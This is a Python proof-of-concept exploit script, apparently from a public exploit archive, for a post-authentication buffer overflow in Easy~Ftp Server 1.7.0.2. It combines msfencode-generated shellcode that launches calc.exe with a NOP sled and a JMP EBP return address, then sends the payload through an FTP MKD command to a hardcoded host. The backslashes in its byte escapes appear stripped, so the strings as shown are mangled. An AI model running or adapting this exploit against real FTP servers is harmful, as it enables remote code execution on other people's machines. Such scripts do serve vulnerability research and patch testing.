#!/usr/bin/python

# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Author: dookie2000ca
# Date: 14/02/2010
# Found by: loneferret
# Date Found: 13/02/2010

# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP3 Professional

import socket
import sys

# msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0ax2fx5c' -e x86/shikata_ga_nai -t c
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)

shellcode = ("xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93"
"x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f"
"x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04"
"x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb"
"x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e"
"x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6"
"xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21"
"xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11"
"x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a"
"x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5"
"xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21"
"x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69"
"xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36"
"xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5"
"x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b"
"x1bx35x1d")

sled = "x90" * 10
filler = "x90" * 30
eip = "x8Bx38xABx71" # 71AB388B JMP EBP WS2_32.DLL
trailer = "x43" * 48

evil = sled + shellcode + filler + eip + trailer

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.142',21))
s.recv(1024)
s.send('USER dookiern')
s.recv(1024)
s.send('PASS dookiern')
s.recv(1024)
s.send('MKD ' + evil + 'rn')
s.recv(1024)
s.send('QUITrn')
s.close